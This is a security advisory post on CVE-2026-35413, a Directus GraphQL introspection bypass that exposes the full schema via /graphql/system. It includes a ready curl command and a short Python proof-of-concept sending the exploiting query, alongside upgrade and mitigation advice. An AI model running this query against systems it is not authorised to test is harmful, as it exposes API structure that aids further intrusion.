Directus, GraphQL Introspection Bypass, CVE-2026-35413 (medium)

Listen to this Post

Directus versions before 11.16.1 fail to enforce the `GRAPHQL_INTROSPECTION=false` setting on the `/graphql/system` endpoint. When `GRAPHQL_INTROSPECTION=false` is configured, the platform correctly blocks standard GraphQL introspection queries (i.e., `__schema` and __type). However, the `server_specs_graphql` resolver on the `/graphql/system` endpoint was not subject to the same restriction. This resolver returns an equivalent SDL representation of the GraphQL schema. An unauthenticated attacker can send a POST request to `/graphql/system` with a query for `server_specs_graphql` and receive the complete schema definition. This includes all collection names, field names, data types, and relationships. The response is provided without any authentication checks. Authenticated users can also retrieve their respective schemas based on their permission levels. The vulnerability exists because the introspection control logic was not applied to the SDL generation endpoint. This allows an attacker to bypass the intended hiding of schema structure. The issue was fixed in version 11.16.1 by aligning the access control for the SDL endpoint with the `GRAPHQL_INTROSPECTION` setting. As a result, when introspection is disabled, the `/graphql/system` endpoint now also blocks schema disclosure.
Platform: Directus API
Version: before 11.16.1
Vulnerability: Introspection Bypass
Severity: Medium
date: 2026-04-02

Prediction: Patch 2026-04-02

What Undercode Say:

CURL request to exploit the vulnerability
curl -X POST https://target.com/graphql/system \
-H "Content-Type: application/json" \
-d '{"query":"{ server_specs_graphql(scope: system) }"}'
Python exploit script
import requests
url = "https://target.com/graphql/system"
payload = {"query": "{ server_specs_graphql(scope: system) }"}
response = requests.post(url, json=payload)
print(response.text) Contains full GraphQL SDL

Exploit:

An attacker sends a POST request to `/graphql/system` with a JSON body containing {"query":"{ server_specs_graphql(scope: system) }"}. The server returns the complete GraphQL SDL, exposing the entire schema structure without authentication.

Protection from this CVE

  • Upgrade Directus to version 11.16.1 or later.
  • If upgrade is not possible, restrict network access to the `/graphql/system` endpoint.
  • Monitor logs for suspicious requests to /graphql/system.

Impact:

Exposes collection names, field names, types, and relationships, enabling attackers to map the API surface and plan further attacks (e.g., data extraction, privilege escalation).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top